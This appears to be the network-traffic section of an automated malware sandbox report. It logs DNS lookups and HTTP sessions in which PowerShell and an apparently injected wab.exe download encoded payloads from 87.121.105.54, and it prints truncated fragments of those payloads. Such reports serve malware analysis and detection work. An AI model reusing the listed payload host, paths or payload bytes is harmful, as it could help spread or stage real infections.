                                May 2, 2024 17:14:08.733149052 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733149052 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733150005 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733185053 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733192921 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733206034 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733206987 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733218908 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733232021 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733243942 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733258009 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733258009 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733262062 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733289003 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733310938 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733319044 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733333111 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733344078 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733356953 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733369112 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733376026 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733397007 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733431101 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733583927 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733598948 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733609915 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733622074 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733640909 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733658075 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733665943 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733665943 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733676910 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733680964 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733690977 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733705997 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733720064 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733726978 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733726978 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733732939 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733747005 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733760118 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733766079 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733766079 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733773947 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733786106 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733800888 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733814001 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733825922 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733825922 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733827114 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733839989 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733841896 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733863115 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733865976 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733887911 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733931065 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.733944893 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733957052 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733968973 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733982086 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.733994961 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:08.734009981 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:08.734078884 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:13.568608999 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:14:13.569350004 CEST4972180192.168.2.687.121.105.54
                                May 2, 2024 17:14:43.585829020 CEST804972187.121.105.54192.168.2.6
                                May 2, 2024 17:15:04.104954958 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.230110884 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.230201006 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.232594967 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.357922077 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.698895931 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.699012041 CEST804972534.174.122.2192.168.2.6
                                May 2, 2024 17:15:04.699079037 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.701972961 CEST4972580192.168.2.634.174.122.2
                                May 2, 2024 17:15:04.827132940 CEST804972534.174.122.2192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
May 2, 2024 17:13:05.690109015 CEST  65157        53         192.168.2.6  1.1.1.1
May 2, 2024 17:13:05.778520107 CEST  53           65157      1.1.1.1      192.168.2.6
May 2, 2024 17:15:03.883065939 CEST  63495        53         192.168.2.6  1.1.1.1
May 2, 2024 17:15:04.096370935 CEST  53           63495      1.1.1.1      192.168.2.6
May 2, 2024 17:15:19.752890110 CEST  57831        53         192.168.2.6  1.1.1.1
May 2, 2024 17:15:19.882775068 CEST  53           57831      1.1.1.1      192.168.2.6
Timestamp                            Source IP       Dest IP         Checksum  Code  Type
May 2, 2024 17:13:05.798916101 CEST  192.168.2.6     142.251.40.206  4d5a            Echo
May 2, 2024 17:13:05.922941923 CEST  142.251.40.206  192.168.2.6     555a            Echo Reply
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                      Type            Class        DNS over HTTPS
May 2, 2024 17:13:05.690109015 CEST  192.168.2.6  1.1.1.1  0x1e8e    Standard query (0)  google.com                A (IP address)  IN (0x0001)  false
May 2, 2024 17:15:03.883065939 CEST  192.168.2.6  1.1.1.1  0xb05e    Standard query (0)  www.facesofhoustontx.com  A (IP address)  IN (0x0001)  false
May 2, 2024 17:15:19.752890110 CEST  192.168.2.6  1.1.1.1  0x8c26    Standard query (0)  www.timesrenewables.com   A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                         CName                Address          Type                    Class        DNS over HTTPS
May 2, 2024 17:13:02.938816071 CEST  1.1.1.1    192.168.2.6  0xe285    No error (0)  bg.microsoft.map.fastly.net                       199.232.214.172  A (IP address)          IN (0x0001)  false
May 2, 2024 17:13:02.938816071 CEST  1.1.1.1    192.168.2.6  0xe285    No error (0)  bg.microsoft.map.fastly.net                       199.232.210.172  A (IP address)          IN (0x0001)  false
May 2, 2024 17:13:05.778520107 CEST  1.1.1.1    192.168.2.6  0x1e8e    No error (0)  google.com                                        142.251.40.206   A (IP address)          IN (0x0001)  false
May 2, 2024 17:13:39.178864002 CEST  1.1.1.1    192.168.2.6  0x124     No error (0)  bg.microsoft.map.fastly.net                       199.232.214.172  A (IP address)          IN (0x0001)  false
May 2, 2024 17:13:39.178864002 CEST  1.1.1.1    192.168.2.6  0x124     No error (0)  bg.microsoft.map.fastly.net                       199.232.210.172  A (IP address)          IN (0x0001)  false
May 2, 2024 17:14:23.106656075 CEST  1.1.1.1    192.168.2.6  0xa632    No error (0)  bg.microsoft.map.fastly.net                       199.232.210.172  A (IP address)          IN (0x0001)  false
May 2, 2024 17:14:23.106656075 CEST  1.1.1.1    192.168.2.6  0xa632    No error (0)  bg.microsoft.map.fastly.net                       199.232.214.172  A (IP address)          IN (0x0001)  false
May 2, 2024 17:15:04.096370935 CEST  1.1.1.1    192.168.2.6  0xb05e    No error (0)  www.facesofhoustontx.com                          34.174.122.2     A (IP address)          IN (0x0001)  false
May 2, 2024 17:15:19.882775068 CEST  1.1.1.1    192.168.2.6  0x8c26    No error (0)  www.timesrenewables.com      timesrenewables.com                   CNAME (Canonical name)  IN (0x0001)  false
May 2, 2024 17:15:19.882775068 CEST  1.1.1.1    192.168.2.6  0x8c26    No error (0)  timesrenewables.com                               3.33.130.190     A (IP address)          IN (0x0001)  false
May 2, 2024 17:15:19.882775068 CEST  1.1.1.1    192.168.2.6  0x8c26    No error (0)  timesrenewables.com                               15.197.148.33    A (IP address)          IN (0x0001)  false
                                • 87.121.105.54
                                • www.facesofhoustontx.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 87.121.105.54 | 80 | 5692 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 17:13:09.809696913 CEST | 173 | OUT | GET /Ommestrup.deploy HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.54
Connection: Keep-Alive
May 2, 2024 17:13:09.982659101 CEST | 1289 | IN | HTTP/1.1 200 OK
                                Date: Thu, 02 May 2024 15:13:09 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Last-Modified: Tue, 30 Apr 2024 08:19:38 GMT
                                ETag: "715e8-6174c07ea1a80"
                                Accept-Ranges: bytes
                                Content-Length: 464360
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/octet-stream
                                Data Raw: 36 77 4a 39 77 58 45 42 6d 37 76 51 36 78 77 41 63 51 47 62 36 77 49 45 50 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 68 78 47 30 5a 58 45 42 6d 33 45 42 6d 34 48 78 7a 68 61 78 72 58 45 42 6d 33 45 42 6d 34 48 78 53 51 63 46 79 48 45 42 6d 2b 73 43 4c 46 62 72 41 6e 6e 51 36 77 49 6a 4b 62 71 4e 45 74 6d 6e 36 77 4a 32 77 33 45 42 6d 2b 73 43 66 38 6a 72 41 6e 66 55 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 76 72 41 72 31 7a 63 51 47 62 30 65 4a 78 41 5a 76 72 41 73 38 37 67 38 45 45 36 77 4a 59 73 58 45 42 6d 34 48 35 38 4f 59 33 42 58 7a 4c 36 77 4b 52 61 75 73 43 32 34 57 4c 52 43 51 45 36 77 4c 6e 62 6e 45 42 6d 34 6e 44 63 51 47 62 63 51 47 62 67 63 50 75 43 7a 59 45 36 77 4b 54 77 6e 45 42 6d 37 71 65 55 4e 53 4a 36 77 4b 6f 6c 6e 45 42 6d 34 48 79 64 5a 54 4c 6f 2b 73 43 30 43 48 72 41 6b 66 75 67 63 49 56 4f 2b 44 56 36 77 4a 32 68 6e 45 42 6d 2b 73 43 45 37 70 78 41 5a 76 72 41 72 54 35 63 51 47 62 69 77 77 51 36 77 4b 52 65 58 45 42 6d 34 6b 4d 45 33 45 42 6d 33 45 42 6d 30 4c 72 41 76 [TRUNCATED]
                                Data Ascii: 6wJ9wXEBm7vQ6xwAcQGb6wIEPwNcJARxAZtxAZu5hxG0ZXEBm3EBm4HxzhaxrXEBm3EBm4HxSQcFyHEBm+sCLFbrAnnQ6wIjKbqNEtmn6wJ2w3EBm+sCf8jrAnfUMcpxAZtxAZuJFAvrAr1zcQGb0eJxAZvrAs87g8EE6wJYsXEBm4H58OY3BXzL6wKRausC24WLRCQE6wLnbnEBm4nDcQGbcQGbgcPuCzYE6wKTwnEBm7qeUNSJ6wKolnEBm4HydZTLo+sC0CHrAkfugcIVO+DV6wJ2hnEBm+sCE7pxAZvrArT5cQGbiwwQ6wKReXEBm4kME3EBm3EBm0LrAvKk6wIxioH65OIEAHXV6wIfHusCIKKJXCQM6wJYM3EBm4HtAAMAAHEBm+sCNDSLVCQIcQGbcQGbi3wkBHEBm3EBm4nr6wIlqOsCGDKBw5wAAADrAv8fcQGbU3EBm3EBm2pAcQGb6wIZ1Inr6wI8KHEBm8eDAAEAAADgVwXrAn3UcQGbgcMAAQAA6wKI4nEBm1NxAZvrAuW8ietxAZvrAtv1ibsEAQAAcQGb6wKfZ4HDBAEAAHEBm+sCiRFTcQGbcQGbav/rAtRJ6wL2q4PCBXEBm3EBmzH2cQGbcQGbMcnrAohWcQGbixrrAuV86wIPrUFxAZvrAmFYORwKdfNxAZtxAZtG6wKH8esCUVCAfAr7uHXd6wLg2esCXGuLRAr86wLJTOsCnFwp8HEBm3EBm//S6wJLQ+sCDeS65OIEAHEBm3EBmzHAcQGb6wLsBYt8JAzrApCB6wK7sIE0BzMTHYPrAgHZcQGbg8AEcQGbcQGbOdB15XEBm3EBm4n76wKsm3EBm//XcQGb6wJBPrf/e74gIHsG8Jr4CmbHp8Vu5P4CwZxwBBaS769SNm4CwfZP1oY6yQhmx0gK1qotFAt2nHJO44PQsuJAqUIJnHI7XsqvCsnaxz4Tb2gnBZzHPhOvzJelnPc+
May 2, 2024 17:13:09.982822895 CEST | 1289 | IN | Data Raw: 45 37 64 71 72 58 2b 63 78 7a 34 54 62 36 37 72 54 4a 51 47 32 52 49 64 67 37 66 59 70 64 56 30 6b 50 36 32 4e 7a 4b 4d 4b 68 36 57 69 6f 77 35 6c 39 79 32 2b 74 30 66 77 7a 4c 53 6c 67 62 5a 45 68 32 44 75 71 5a 5a 67 54 4d 54 6f 2f 42 4c 73 78
                                Data Ascii: E7dqrX+cxz4Tb67rTJQG2RIdg7fYpdV0kP62NzKMKh6Wiow5l9y2+t0fwzLSlgbZEh2DuqZZgTMTo/BLsxkH35LrvwiBkALFYD0eCJLbv61DUAf6kuaz+NAwusKYqMcxEx32upbXB/Hl2rhVlt4KtmscgzN1JEFVltwKrl8cgzMr1dBVKsVr5ssZgwvSlMZ3l9dq/48Zg1UqxNOLNZFVKy6FgzMTEgeqwxmDa5yY5zITHeW203s
May 2, 2024 17:13:09.983073950 CEST | 1289 | IN | Data Raw: 6f 74 38 6e 77 6f 4a 74 4b 49 2b 50 2f 2b 44 6b 47 76 56 51 32 59 68 46 63 71 36 56 6c 65 73 47 6e 76 6f 45 75 4e 4e 61 45 32 67 6a 58 6d 4d 31 2b 39 6e 71 44 58 56 39 6a 52 61 66 64 59 70 75 6d 6d 61 6b 49 6f 78 45 78 30 36 58 6e 69 43 42 62 4c
                                Data Ascii: ot8nwoJtKI+P/+DkGvVQ2YhFcq6VlesGnvoEuNNaE2gjXmM1+9nqDXV9jRafdYpummakIoxEx06XniCBbLioUEU6E07YCdfxR4i+kYQFnJ/59cY7IS9BdCvmv6CMI4lSUcQJICYjmgkcMgbVAB7VJs2Vfz2OBRE/stf4Df07SG6+Eh7uvtLTTvA9gw5Ng2iGAo+DCee4E8fuvEUga51JEtFADlEcbgUludkp6GQoBah2VaAskNs
May 2, 2024 17:13:09.983124971 CEST | 1289 | IN | Data Raw: 2b 49 68 5a 6f 74 6a 63 2f 6c 67 51 68 30 39 77 6c 31 6e 78 71 69 47 39 61 4c 52 78 5a 31 6f 67 77 37 2f 5a 68 6f 56 5a 45 61 44 48 63 61 4d 58 50 4f 77 78 4c 76 32 37 69 57 2b 34 49 7a 45 39 45 4b 6d 6c 51 32 36 55 71 4c 4f 61 49 2f 65 56 56 6d
                                Data Ascii: +IhZotjc/lgQh09wl1nxqiG9aLRxZ1ogw7/ZhoVZEaDHcaMXPOwxLv27iW+4IzE9EKmlQ26UqLOaI/eVVmJrgsWaY8dXvgAdjOMEwgzduhsoczmpirMhMd1IyfNxDRkupLn3eoAsSnymVNktqkoVvEAtwE/toxQYEK0RonHgrhbpBg9+n/4mZswETav0ul+IPn7FUC7Q8Tx/P49GDh1idXGDN1mENpltfcuF4BOYtrS6/bko+HM
May 2, 2024 17:13:09.983206034 CEST | 1289 | IN | Data Raw: 39 6f 6d 44 2b 65 32 41 47 72 6d 4d 6f 35 6a 4d 7a 31 59 72 49 6a 70 43 75 66 70 37 56 51 69 33 33 6f 4f 73 6a 47 54 31 2b 50 42 4a 49 67 7a 4d 54 48 59 4d 7a 45 78 32 44 4d 78 4d 64 67 7a 4d 54 48 59 4d 7a 45 78 32 44 4d 32 77 64 37 34 4e 36 55
                                Data Ascii: 9omD+e2AGrmMo5jMz1YrIjpCufp7VQi33oOsjGT1+PBJIgzMTHYMzEx2DMxMdgzMTHYMzEx2DM2wd74N6U2TTt/ooKYNHbmJpAnSyJznuP+FKjDNGHYMzEx2DMxMdgzMTHYMzEx2DMxMdg0LzYED0N3lHEZIpp5p2fZiyJzl1UKGs0YkfZt4Tkt/Y6z/eAvGKsPYvQoEK0hoMHgvTaJDyHvgt7lBvhHnpmFfJ7mTGn45fJD6IWP
May 2, 2024 17:13:09.983253002 CEST | 1289 | IN | Data Raw: 53 78 54 5a 6a 45 64 59 49 6b 55 71 48 61 6a 76 78 38 42 5a 47 62 67 43 42 64 30 64 57 56 6b 5a 52 47 4f 78 45 61 65 31 36 79 68 48 67 2f 45 48 34 6b 71 65 50 70 38 54 48 59 4e 4d 48 4a 6b 50 67 42 4d 64 32 37 49 58 4f 57 78 2b 69 45 73 43 48 7a
                                Data Ascii: SxTZjEdYIkUqHajvx8BZGbgCBd0dWVkZRGOxEae16yhHg/EH4kqePp8THYNMHJkPgBMd27IXOWx+iEsCHzetI9zsnLcXMKOEwkCm69QijQLAIFwYOpLuxH3qkwLYD/rQJEKBCtIaBB63wWCRYNPV2/6VJwyNODbK0YpjtEeK5A7AjRzxITIe/Z0ZvgfeSnu6+UgSgyOuHYMzEx2DMxMdgzMTHYMzEx2DMxMd82gkTQwEiZmUtHs
May 2, 2024 17:13:09.983308077 CEST | 1289 | IN | Data Raw: 49 2b 6f 62 58 2f 49 75 47 69 78 39 54 79 2f 71 30 52 4e 2b 36 30 72 55 41 34 4e 70 73 35 31 6d 45 68 74 6b 6d 44 33 6b 67 4d 64 67 7a 79 63 47 53 6f 7a 45 30 4a 50 66 71 68 50 31 68 4f 69 41 65 6c 44 56 63 42 74 32 77 41 41 56 59 44 66 2f 45 50
                                Data Ascii: I+obX/IuGix9Ty/q0RN+60rUA4Nps51mEhtkmD3kgMdgzycGSozE0JPfqhP1hOiAelDVcBt2wAAVYDf/EPgorT0TJ1KgOOAEeONROAg7y5aayqdaD2NM5HOYKjD9cfMnEBWlzxrsvhVud29nHAvizqaugh+9S+6j+xoUpNRiHL3MBQSjPP8/KFmV3P8Ib0p9PVgt/lOUDlwe2Tn2gWnOsaFeFJa2LLlJ+2HMk44ykDzx7LgkFOR
May 2, 2024 17:13:09.983371973 CEST | 1289 | IN | Data Raw: 67 78 44 33 52 67 6e 47 67 45 76 58 57 65 73 75 44 64 57 62 4a 4b 6e 45 42 55 4f 37 78 77 75 68 6a 63 36 6e 54 46 54 79 41 75 48 2b 4d 6c 41 59 72 71 6d 35 6d 33 39 34 31 48 59 41 64 6c 6f 47 79 39 4f 67 79 4b 37 63 63 4e 61 6a 71 59 39 70 6a 33
                                Data Ascii: gxD3RgnGgEvXWesuDdWbJKnEBUO7xwuhjc6nTFTyAuH+MlAYrqm5m3941HYAdloGy9OgyK7ccNajqY9pj3gJS5kShomoDXMRMdjDJOHYMzEx2DMxMdgzMTHYMzEx2DMxMdg1d5mEPbE0MONcKXW7GIcIBdwDmQuNpA07ykM1gYeaYvVLg4AsBhWDKFku4JbNJIAsBbYFj1RaMkop2DAsXWt2UekvPiA676AsXFxCj4mhsRM4zEV
May 2, 2024 17:13:09.983428001 CEST | 1289 | IN | Data Raw: 34 35 78 38 46 64 54 73 36 7a 7a 70 68 55 67 35 4e 6d 46 71 48 2f 31 70 64 4d 65 76 4f 46 6c 45 67 30 6f 56 56 48 54 66 49 7a 4d 32 63 55 6b 63 66 6f 35 56 44 37 57 58 34 76 35 7a 61 43 35 67 35 63 77 31 6c 6e 35 71 59 37 7a 49 54 48 55 38 46 66
                                Data Ascii: 45x8FdTs6zzphUg5NmFqH/1pdMevOFlEg0oVVHTfIzM2cUkcfo5VD7WX4v5zaC5g5cw1ln5qY7zITHU8FfwC/H6Cqx17Kq76HZ/ETELa2HaCUNopSX8Jy++O2otv5XP0FtCkIBUZW4HBgLZ+tQKYp2zFbAsDo7hTAkvagpaeoCjg/X1v+9U11qZ6rllNUEmA+RiVrhQswS31HT2hoe+tp4a9POdzWHSiy+XoKx4ScaWb9kYey0b
May 2, 2024 17:13:09.983489037 CEST | 1289 | IN | Data Raw: 45 72 39 45 64 64 69 36 36 74 48 52 45 51 6c 31 70 61 6b 6c 52 58 68 4a 67 49 70 4d 4d 6b 6c 70 35 73 2f 39 57 69 78 4a 44 48 50 77 6d 51 4f 74 68 65 54 50 54 41 69 2b 59 52 2b 44 4d 30 4f 6c 45 41 35 54 79 72 59 4a 5a 36 54 6e 42 6b 57 55 49 72
                                Data Ascii: Er9Eddi66tHREQl1paklRXhJgIpMMklp5s/9WixJDHPwmQOtheTPTAi+YR+DM0OlEA5TyrYJZ6TnBkWUIroWmjSU1pSbCmg4/48mVGt0Ftu57S57sXwW+tcbI3n1xPlteAXwWOZgiK/buq5OgTMTooxpkPACxFIn05tCpLyV53AC8nlbRuiS7CreqlTTr5r9gjuOJUJJMWC3AfitZKRc8m3mkn3P++krfzJA3wtUczXv2JQ8cUq
May 2, 2024 17:13:10.150049925 CEST | 1289 | IN | Data Raw: 75 79 62 6d 44 32 4e 41 74 72 32 62 52 69 4e 51 59 45 4b 30 52 49 58 48 6c 55 71 33 66 6b 34 31 4a 43 61 5a 53 31 36 34 79 68 63 78 65 4f 34 72 30 50 67 70 4f 63 62 55 73 43 4f 46 68 78 50 62 6e 6b 70 44 30 57 58 75 4e 56 72 78 64 77 32 51 7a 56
                                Data Ascii: uybmD2NAtr2bRiNQYEK0RIXHlUq3fk41JCaZS164yhcxeO4r0PgpOcbUsCOFhxPbnkpD0WXuNVrxdw2QzVtQMdA9C2bJW9pl+Hac5IlQB+g9PbEk2WHi2bs0Ighjowkku5PQnOKAvARAxNMQYEK0RoHHgvKYIqD7riFUi3sG6OHdi2Ee4Ou+5nK2Bs4Bcyp8Jl1aXWYQmgcG9hkEx2DMxMdgzMTHYMzEx2DMxMdgzMTbcvg6xPx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49721 | 87.121.105.54 | 80 | 5512 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 17:14:07.891634941 CEST | 185 | OUT | GET /iYbZIhIVLPBjJUzImyrJN72.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.54
Cache-Control: no-cache
May 2, 2024 17:14:08.062421083 CEST | 1289 | IN | HTTP/1.1 200 OK
                                Date: Thu, 02 May 2024 15:14:07 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Last-Modified: Tue, 30 Apr 2024 07:27:49 GMT
                                ETag: "41e40-6174b4e9a8740"
                                Accept-Ranges: bytes
                                Content-Length: 269888
                                Content-Type: application/octet-stream
                                Data Raw: 0e fb 38 46 f1 30 57 87 74 ff ea 4b 05 06 cb b9 8c 65 2d 4d d1 f8 b4 8d d7 e9 10 39 06 77 79 f8 b4 fc 64 bf 72 9f 7f 95 b3 ad c2 98 b2 e0 56 a8 7a 00 cb 9a bb 22 d9 6e ac 7a 42 a2 9b c9 db 83 24 f2 a8 31 a5 41 65 b4 fb 53 88 e9 9f 16 b3 2b 16 e0 43 9c a0 e7 96 e7 2a 79 e9 2d 7c 7f 9a b1 a0 e1 b6 e4 83 76 fc fe b4 ab 7e 23 73 ef eb 75 a2 14 a9 60 00 51 88 32 64 8a 8e 32 be e0 bf 3f 92 af 6e 1f 00 a5 ee 99 64 eb 08 a4 bc 88 b8 b3 74 96 59 ed e5 4f 19 c6 9f e7 f9 b1 d1 78 0a ac b8 78 eb da e6 22 c8 11 70 14 f8 93 5b ab 82 fd 4e d1 e3 c8 87 3a ca b0 47 bd 70 2e 4e a1 c5 8e 52 52 f0 5c 0f 16 42 76 2d 3a af 39 b1 77 5d 63 a4 5f 33 5a ad 87 45 b2 a7 87 7e 6c 71 de a8 17 b2 66 c8 1c db 7b 5d 72 96 74 0d 16 0b 2a 03 71 0f 62 96 52 eb 19 d1 b3 63 4e 51 9d fe b3 f7 95 f2 87 bc 69 b9 41 3e 5a 3b d7 7d 46 73 6d 48 93 1c 5e c3 dc ff 94 30 bf 04 92 c0 4a a4 6a 01 b8 7a fb d5 25 c5 04 db 92 b9 3f fc 03 75 58 72 e4 ef 15 bc 7d 98 9d e7 4f 22 ac 0c f5 5a 80 2e ea c8 f2 c5 d4 85 00 48 e0 5b 9d a5 4c 8e ec 4c 2f a2 05 [TRUNCATED]
                                Data Ascii: 8F0WtKe-M9wydrVz"nzB$1AeS+C*y-|v~#su`Q2d2?ndtYOxx"p[N:Gp.NRR\Bv-:9w]c_3ZE~lqf{]rt*qbRcNQiA>Z;}FsmH^0Jjz%?uXr}O"Z.H[LL/,D4&Tb6]mp0`HWEv}9mpC"!G/1GB;)sa({Nz"h[Z)x~SnD<!DH5azf&P9Em_NP QN0p yG|vTW,AwobFexrI~JZc)`|~065K86DfBt@)Y,y5lX/>%Ps#D"?DTi~Mg$]0x`'p}U9N{*Z1tx5AA\3{=O|,*6~Z- QM(n(.]-_2V@kMggr5|6lP*Z+42qDuf:X8j7a^gCD3+Ukz7&(n.jMC<?G[ }P66!03jZ+J[P;Fmvd)`|'q&daNrhKDs;alib [TRUNCATED]
May 2, 2024 17:14:08.062469959 CEST | 1289 | IN | Data Raw: ce a3 08 7e 28 03 1d e5 44 93 c3 9e 0b 91 27 25 38 9c fc 83 0a ac ea b6 3d 8a 1b fd 9c 2f fc 25 77 c0 c9 47 6a 14 9a c6 4d cc 3a 33 36 00 ef 45 55 3d 33 55 9f 49 c2 a0 42 bd 8b f7 9b d9 eb 8e f6 0f 96 f8 01 5b f7 8e 6b 25 9b a9 6d b3 f3 94 8c f5
                                Data Ascii: ~(D'%8=/%wGjM:36EU=3UIB[k%mdejbYzs~=BC=WIRR/d(~u3CNaQbS/S:qGSo9,'5u~gJ}l:(Q:3"!WR$$
May 2, 2024 17:14:08.062485933 CEST | 1289 | IN | Data Raw: 10 c5 e2 c6 40 6b e5 11 d7 04 14 0d b7 b8 c7 dd ba c2 1e 4d b9 13 bc db b1 af d5 ec 67 67 dd e0 92 72 cd 35 08 07 fe ca a4 7c 9c d7 c9 d5 36 1d c4 ec d2 92 6c 50 2a ca 05 e3 5a f8 2b 34 32 82 71 7f 0e 44 e0 0b ed 9f d3 75 df 66 b7 3a 58 38 db d6
                                Data Ascii: @kMggr5|6lP*Z+42qDuf:X8j7a^gCD3+Ukz7&(n.jMC<?G[ }P66!03jZ+J[P;Fmvd)`|'q&daNrhKDs;ali
May 2, 2024 17:14:08.062499046 CEST | 1289 | IN | Data Raw: ea 45 f6 8e fc 6d 5f f0 4e b4 f6 50 bf dd f6 58 25 96 98 1e da 3b f5 12 f5 60 95 20 79 bb c4 47 c5 6c e2 8d ee c1 1e 1a ee 76 16 dc 54 18 99 ff 77 2c c5 c5 07 41 84 9c 77 8b 13 84 fc 6f 62 d8 eb e8 d2 a5 ee 46 06 11 65 78 f7 eb a3 72 9a 49 7e 4a
                                Data Ascii: Em_NPX%;` yGlvTw,AwobFexrI~JZc)`|~065K86DfBt@)Y,y5lX/>%Ps#D"?DTi~Mg$]0x`'p}U9N{*Z1tx5AA\3{=O|,*6~
May 2, 2024 17:14:08.062515020 CEST | 1289 | IN | Data Raw: 3a 1d da dd 9b 94 58 e7 22 41 b2 6d 12 d6 38 4b 4e 1e 60 b1 63 ef 92 5f 35 d6 04 da 2b aa 9a b3 9b 12 c8 27 4e 7d 18 32 31 d5 f4 4e 8d e5 b2 d4 f9 43 d0 1b 4c 39 6f 04 d8 3c b2 aa 93 ff 04 11 4a 92 ad b8 c8 dc ff 20 3b bf 04 92 fd ad a4 6a 01 b7
                                Data Ascii: :X"Am8KN`c_5+'N}21NCL9o<J ;j-P0mFy 2Y}_pO7|ymK"]9g).|Hp:KH91 \u)m.%Opz>0J>$h27&txtvgeU!*wC
May 2, 2024 17:14:08.062566042 CEST | 1289 | IN | Data Raw: fb 5f 9d 38 a1 01 d4 86 58 35 87 f9 05 60 6b 1c 7e 1f 75 eb 17 2e 82 32 c8 e3 83 4e b2 96 26 95 38 4f 3b b1 a9 b0 ea 11 9d f7 84 0e c4 51 d2 4d c7 19 11 4a cd 10 da 9e cf 6a d7 01 f4 5b 27 a5 a2 bf 88 55 ef 81 d6 bf e8 f6 b4 c9 6c 7e be 80 ed fe
